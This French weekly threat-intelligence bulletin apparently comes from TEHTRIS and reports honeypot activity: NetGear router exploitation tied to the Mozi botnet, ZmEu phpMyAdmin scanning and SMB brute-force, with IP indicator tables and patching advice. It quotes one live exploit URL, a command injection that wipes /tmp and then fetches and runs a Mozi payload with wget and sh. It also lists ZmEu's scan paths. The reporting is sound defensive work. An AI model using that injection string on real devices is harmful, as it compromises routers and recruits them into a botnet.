Cette semaine, TEHTRIS évoque 3 activités malveillantes observées sur son réseau de honeypots déployé à l’international.
Des IP inconnues des blacklists publiques enregistrées en Chine ciblent les routeurs NetGear
Cette semaine, 22 IPs uniques ont réalisé la requête URL suivantes sur plus de la moitié de nos honeypots européens :
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192.168.1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1L’objectif du cyber criminel serait de récupérer des fichiers depuis l’adresse IP par défaut du routeur NetGear : 192.168.1[.]1.
Dans cette requête, on trouve aussi le ‘Mozi.m’ qui correspond au botnet Mozi. En 2019, des chercheurs à Netlab ont découvert que ce botnet se répandait via des vulnérabilités notamment sur des objets connectés. En général, Mozi est utilisé pour lancer des attaques DDoS, exécuter la charge utile d’une URL spécifique ou exécuter des commandes systèmes ou personnalisés.
Les tentatives d’exploitation des routeurs NetGear remontent à 2018 sur les versions DGN1000, dont la vulnérabilité qui permet d’exécuter du code à distance est connue depuis 2017. Ces tentatives d’attaque n’ont pas cessé d’évoluer depuis.
IoCs :
| IP | AS | Country |
| 112.94.97[.]143 120.85.112[.]76 120.85.114[.]114 120.85.114[.]125 120.85.117[.]63 120.85.183[.]140 120.85.186[.]39 120.85.91[.]174 220.198.204[.]108 220.198.205[.]193 27.47.3[.]48 | AS 17622 China Unicom Guangzhou network | CN |
| 120.86.237[.]42 120.86.238[.]9 120.86.239[.]161 120.86.255[.]200 27.43.180[.]192 27.43.205[.]168 | AS 17816 China Unicom IP network China169 Guangdong province | CN |
| 121.206.154[.]170 175.4.219[.]195 49.119.92[.]28 223.149.242[.]216 | AS 4134 Chinanet | CN |
| 178.72.70[.]56 | AS 44257 MTS PJSC | RU |
Sur ces 22 IP uniques, 12 (en gras dans le tableau ci-dessus) – soit plus de la moitié – sont inconnues des bases de données publiques d’IP malveillantes, les autres restant peu connues. De plus, 21 sont enregistrées auprès d’AS localisés en Chine.
TEHTRIS recommande de patcher les routeurs et d’effectuer les mises à jour dès qu’elles sont disponibles.
ZmEu : un bot crawler à la recherche de vulnérabilités dans phpMyAdmin
Cette semaine, dans le top 10 des user agents observés, ZmEu réalise une entrée spéciale avec près de 500 hits. Il s’agit d’un bot crawler qui scanne les serveurs web qui peuvent être attaquées via les vulnérabilités contenues dans le programme phpMyAdmin (versions vulnérables du logiciel système de gestion de bases de données mySQL). Il est aussi en mesure de réaliser des attaques bruteforce sur le protocole SSH et laisser des backdoors persistantes. Ce crawler aurait été développé en Roumanie et sévit massivement depuis 2012.
Requêtes URL observées sur nos honeypots :
/w00tw00t.at.blackhats.romanian.anti-sec:)
/pma/scripts/setup.php
/phpmyadmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/myadmin/scripts/setup.php
/MyAdmin/scripts/setup.phpL’outil ZmEu réalise des scans automatiques en recherchant les paths classiques vers les configurations du site.
Ces requêtes URL ont été réalisées par 6 IP uniques, toutes répertoriées dans des blacklists publiques d’adresses IP malveillantes, sur la totalité de nos honeypots européens.
IoCs :
| IP | AS | Pays |
| 165.232.160[.]6 | AS 14061 DIGITALOCEAN-ASN | SG |
| 188.166.5[.]240 | AS 14061 DIGITALOCEAN-ASN | NL |
| 167.71.60[.]238 | AS 14061 DIGITALOCEAN-ASN | DE |
| 157.230.110[.]53 | AS 14061 DIGITALOCEAN-ASN | DE |
| 165.22.24[.]138 | AS 14061 DIGITALOCEAN-ASN | DE |
| 95.179.164[.]71 | AS 20473 AS-CHOOPA | DE |
Pour sécuriser les serveurs Web contre cette menace, TEHTRIS recommande de mettre à jour vos logiciels et d’utiliser la dernière version de PhpMyAdmin.
Persistance des attaques bruteforce sur le protocole SMB par des IP inconnues des blacklists publiques d’IP malveillantes
Cette semaine, 8 IP (en gras dans le tableau ci-dessous) du top 10 des IP qui ont réalisé des tentatives de bruteforce sur le protocole SMB de nos honeypots, sont des IP inconnues des bases de données publiques d’IP réalisant des activités malveillantes. 4 d’entre elles sont enregistrées en Amérique du Sud, comme relevé en semaine 48.
IoCs :
| IP | AS | Pays |
| 88.204.241[.]10 | AS 9198 JSC Kazakhtelecom | KZ |
| 114.32.253[.]93 | AS 3462 Data Communication Business Group | TW |
| 189.203.208[.]115 | AS 22884 TOTAL PLAY TELECOMUNICACIONES SA DE CV | MX |
| 200.119.215[.]68 | AS 25620 COTAS LTDA. | BO |
| 152.231.117[.]93 | AS 27651 ENTEL CHILE S.A. | CL |
| 186.96.10[.]37 | AS 22884 TOTAL PLAY TELECOMUNICACIONES SA DE CV | MX |
| 119.161.98[.]151 | AS 139195 Seans Media Pvt Ltd | IN |
| 142.190.96[.]94 | AS 13760 UNITI-FIBER | US |
| 119.93.147[.]253 | AS 9299 Philippine Long Distance Telephone Company | PH |
| 45.225.194[.]141 | AS 266948 IBIUNET MULTIPLAY | BR |